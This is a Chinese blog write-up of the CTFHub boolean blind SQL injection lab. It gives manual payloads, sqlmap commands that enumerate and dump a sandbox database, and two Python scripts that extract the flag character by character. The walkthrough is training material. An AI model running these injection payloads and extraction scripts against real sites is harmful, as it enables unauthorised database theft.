CTFHUB-技能树-Web题-SQL注入-布尔盲注

已于 2024-05-09 21:14:47 修改
阅读量599 收藏 11
点赞数 7
分类专栏: CTFHUB解题思路 文章标签: 前端 sql 数据库
于 2024-04-02 22:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Static______/article/details/137293736
版权

技能树-Web题-SQL注入-布尔盲注

文章目录

布尔盲注
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
判断注入点

利用返回yes或no进行判断注入

输入1 (也可输入1 and 1=1)返回 query_success

在这里插入图片描述

输入1’ (也可输入1 and 1=2)返回query_error
在这里插入图片描述

说明存在注入点

判断数据库名长度

发现1 and length(database()) >=1 正确
1 and length(database()) >=5 错误
1 and length(database()) >=4正确

所以判断当前数据库长度为4

猜数据库名

由于返回值是正确或错误,寻常and 后面布尔盲注语句不好使,因为它们是根据查询结果为空来判断。
这时候想到用if语句

if(expr1,expr2,expr3),如果expr1的值为true,则执行expr2语句,如果expr1的值为false,则执行expr3语句。

于是要确定数据库名字,利用语句:

if(substr(database(),1,1)='s',1,(select table_name from information_schema.tables))

if(substr(database(),1,1)='a',1,(select table_name from information_schema.tables))

1 and substr(database(),1,1)='s'

1 and substr(database(),1,1)='a'

要一个一个判断有点难,可以用python脚本

也可以利用sqlmap来跑

sqlmap

爆表

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs

找flag

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

然后脱库

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump
python代码
import requests
import time

urlOPEN = 'http://challenge-80bbba4d1e9ce716.sandbox.ctfhub.com:10080/?id='
starOperatorTime = [] 
mark = 'query_success'

def database_name():
	name = ''
	for j in range(1,9):
		for i in 'sqcwertyuioplkjhgfdazxvbnm':
			url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
			# print(url+'%23')
			r = requests.get(url)
			if mark in r.text:
				name = name+i
				

				print(name)
				
				break
	print('database_name:',name)

	
database_name()

def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
			    # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)

#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))

def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=''
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)

column_name()

def get_data():
        name=''
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()

在这里插入图片描述
在这里插入图片描述

第二个

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
session=requests.session()
url = "http://challenge-230a3ccdd5ccd1a7.sandbox.ctfhub.com:10800/?id="
name = ""

# for k in range(1,10):
#     for i in range(1,10):
#         print(i)
#         for j in range(31,128):
#             j = (128+31) -j
#             str_ascii=chr(j)
#             #数据库名
#             #payolad = "if(substr(database(),%s,1) = '%s',1,(select table_name from information_schema.tables))"%(str(i),str(str_ascii))
#             #表名
#             #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,i,str(str_ascii))
#             #字段名
#             payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str(str_ascii))
#             str_get = session.get(url=url + payolad).text
#             if "query_success" in str_get:
#                 if str_ascii=="+":
#                    sys.exit()
#                 else:
#                     name+=str_ascii
#                     break
#         print(name)

#查询字段内容
for i in range(1,50):
    print(i)
    for j in range(31,128):
        j = (128+31) -j
        str_ascii=chr(j)
        payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str_ascii)
        str_get = session.get(url=url + payolad).text
        if "query_success" in str_get:
            if str_ascii == "+":
                sys.exit()
            else:
                name += str_ascii
                break
    print(name)

在这里插入图片描述

python炒粉
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
SQL注入之基于布尔详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间的。这篇文章主要讲解的是基于布尔。下面来一起看看吧。
CTFHUB-技能-Web-SQL注入-时间
Static______的博客
04-03 808
1=1即为真,那么将会执行sleep(3),也就是睡眠3秒钟(默认单位为秒)那既然我们可以构造这个函数,我们就用这个函数来到时间这个靶场尝试一下。得到四个库名,猜测flag最有可能在sqli中,尝试爆破表名来看看。1=1就是我们的条件,sleep(3)为我们的A,1为我们的B。说明即存在时间,我们通过sqlmap可以直接跑出结果。庞大的工作量太过耗时,所以到此为止,开始sqlmap注入。得到表名为flag,news,猜测结果就在flag表中。到这我们已经了解了这个判断语句,那我们可以尝试。
SQL注入布尔和时间——CTFHUB 使用Burpsuite进行半自动注入
PigletTT的博客
07-10 2252
SQL注入布尔和时间——CTFHUB为例 一、原理 1.布尔布尔一般在页面只会显示正确和错误两种显示,因此在这种情况下我们不知道如何去获取数据库的详细内容,包括当前所在的数据库,数据库里面的表以及每个表的字段和内容了。在这种情况下需要借助一些特别的函数来判断注入的语句是否正确,从而获取数据库的信息。以下函数是进行时常用的函数 length(str) //返回str字符串的长度。 1 and length(database())=4 //判断数据库名字的长度是否为4
布尔(ctfhub)_ctf 布尔脚本
最新发布
2401_83704125的博客
04-10 843
布尔的条件: ?id=1’ and 1=1–+ 真页面true?id=1’ and 1=2–+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数 2. 根据库名长度爆库名 使用substrate()函数逐个猜数据库名 3. 爆数据表数量 使用mysql的查询语句。从1开始试错 4.爆数据表名长度 使用 limit 0,1(第一张表),limit 1,1(第二张表)
CTFhub 报错注入
plant1234的博客
06-16 216
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHUB-布尔
Web学习之路
03-24 932
true 与 false
CTFHub技能 Web-SQL注入详解
千寻的博客
11-21 1872
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2483
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
vue+element-ui+websql
04-19
使用vue+elemetnui框架,采用websql/localsotrage作为数据存储,实现增删改查
第三章-SQL语言练习和答案.doc
11-17
第三章-SQL语言练习和答案.doc
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
CTFHub_技能_Web之SQL注入——布尔详细原理讲解_保姆级手把手讲解自动化布尔脚本编写
Ho1aAs‘s Blog
11-19 6762
文章目录前言思路原理常用函数完 前言 布尔,与普通注入的区别在于“”。在注入语句后,不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 思路 由于对数据库的信息了解甚少,需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
CTFHub - 报错注入
Have_a_great_day的博客
09-09 534
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB技能SQL注入
2401_82985722的博客
03-26 629
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
CTFHub-SQL注入
yuqie的博客
06-13 868
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
解记录-CTFHub技能|Web|SQL注入
weixin_57448435的博客
09-14 2113
数据库注入
CTFHUB(WEB) 布尔注入
qq_54929891的博客
09-21 1231
麻烦的来了诶,装作不知道是布尔注入,依然按照目意思输入1看看 从这里可以知道我们不需要打引号 哦对了,我们先应该判断是否有注入点,利用真假语句来判断id的值是否可以改变sql语句的变化 通过恒真语句and 1=1和恒假语句and 1=2得知id的值可以改变sql语句的走向,说明这里存在注入点,然后便上网查询一下布尔注入应该要用到哪些函数语句 length()返回长度 这里弊端就是因为都是ctfhub上面的,只是注入方式改变,数据库名啥的没变,所以只是为了让我们动手用这种方法..
ctfhub sql
07-28
回答: 对于ctfhub sql的问,我可以提供一些相关的信息。引用\[1\]中的命令"python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” -D sqli -T flag --columns"是使用sqlmap工具来进行SQL注入攻击的命令,其中的参数"-u"指定了目标URL,"-D"指定了数据库名称,"-T"指定了表名,"--columns"用于获取表的列信息。引用\[2\]中的命令"sqlmap -u "http://challenge-317cd0f12af09335.sandbox.ctfhub.com:10800/?id=1" --dbs"是用来爆破数据库的命令,"--dbs"用于获取数据库的名称。引用\[3\]中的命令"python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” -D sqli --tables"是用来获取数据库中的表信息的命令。综上所述,这些命令都是用来进行SQL注入攻击或者获取数据库信息的工具命令。 #### 引用[.reference_title] - *1* *3* [CTFHUB之sql注入(特详解)](https://blog.csdn.net/xhy18634297976/article/details/117967717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB-SQL注入](https://blog.csdn.net/m_de_g/article/details/119151644)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值